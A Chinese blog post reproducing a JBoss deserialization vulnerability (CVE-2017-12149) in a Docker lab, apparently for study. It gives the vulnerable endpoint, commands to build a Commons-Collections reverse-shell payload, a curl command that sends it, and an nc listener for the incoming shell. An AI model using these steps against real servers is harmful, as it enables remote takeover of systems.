1. 程式人生 > 其它 >漏洞復現-CVE-2017-12149-jboss反序列化

漏洞復現-CVE-2017-12149-jboss反序列化

0x00 實驗環境

攻擊機:Win 10

靶場:docker拉的vulhub靶場

0x01 影響版本

實驗版本jboss:as-6.1.0,對版本低於7.x的有影響,即:5.x6.x版本

0x02 漏洞復現

(1)存在漏洞的頁面:

http://x.x.x.x:8080/invoker/readonly

(2)說是這裡存在反序列化,不太懂java程式碼,等以後學了這個再看看吧。

序列化:
FileOutputStream fos = new FileOutputStream(file);
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(st);
反序列化:
FileInputStream fis = new FileInputStream(file); ObjectInputStream ois = new ObjectInputStream(fis); Student st1 = (Student) ois.readObject();

(3)兩種拿許可權方式:

方式一:

直接使用現有的工具:

方式二:

使用反序列化:

(1)下載工具(工具一概不提供,本人堅決反對利用教學方法進行犯罪的行為,一切犯罪行為必將受到嚴懲,綠色網路需要我們共同維護,更推薦大家瞭解它們背後的原理,更好地進行防護。禁止任何人轉載到其他站點,禁止用於任何非法用途。如有任何人憑此做何非法事情,均於筆者無關,特此宣告。

):

(2)生成一個ser的exp:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:2333   

(3)執行攻擊:

curl http://xx.xx.xx.xx:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

(4)2333埠開啟監聽後將收到shell:

nc -lvp 2333

0x03 漏洞修復

1、升級jboss為7.x版本